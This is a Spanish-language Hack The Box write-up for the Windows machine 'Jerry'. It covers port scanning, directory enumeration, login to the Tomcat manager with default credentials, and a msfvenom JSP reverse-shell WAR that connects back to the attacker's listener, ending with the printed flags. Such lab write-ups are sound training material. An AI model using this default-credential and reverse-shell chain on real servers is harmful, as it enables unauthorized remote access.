Jerry
Sobre esta maquina: HTB
Sistema Operativo: Windows
Skills Usados:
java
LFI
war
Primer reconocimiento con nmap:
nmap -p- --open -sS -T4 -Pn -n 10.10.10.95 -oN First_Scann PORT STATE SERVICE 8080/tcp open http-proxy
Solo tiene abierto el puerto 8080 vemos lo que corre:
captura
Enumeramos subdominios:
gobuster dir -u "http://10.10.10.95:8080/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) [+] Url: http://10.10.10.95:8080/ [+] Method: GET [+] Threads: 20 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s Starting gobuster in directory enumeration mode /docs (Status: 302) [Size: 0] [--> /docs/] /examples (Status: 302) [Size: 0] [--> /examples/] /manager (Status: 302) [Size: 0] [--> /manager/] /http%3A%2F%2Fwww (Status: 400) [Size: 0] /http%3A%2F%2Fyoutube (Status: 400) [Size: 0]
Al ingresar a manager nos lanza un codigo de error pero nos permite visualizar credenciales por defecto, tomcat y s3cret, intentamos lograrnos y tenemos acceso:
captura
Podemos ahora crear un payload con msfvenom que podemos subir como archivo war e intentar que nos de como objetivo final una revserse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war -o revshell.war Payload size: 1099 bytes Final size of war file: 1099 bytes Saved as: revshell.war ls  First_Scann  revshell.war  SVC_Scann nc -lvp 443 listening on [any] 443 ...
captura
nc -lvp 443 listening on [any] 443 ... 10.10.10.95: inverse host lookup failed: Unknown host connect to [10.10.14.3] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>
Estamos dentro, buscamos la primera flag:
dir Volume in drive C has no label. volume Serial Number is 0834-6C04 Directory of C:\Users\Administrator\Desktop\flags 06/19/2018 07:09 AM 06/19/2018 07:09 AM.. 06/19/2018 07:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 2,412,097,536 bytes free C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" type "2 for the price of 1.txt" user.txt 7004dbcef0f854e0fb401875f26ebd00 root.txt 04a8b36e1545a455393d067e772fe90e
Last updated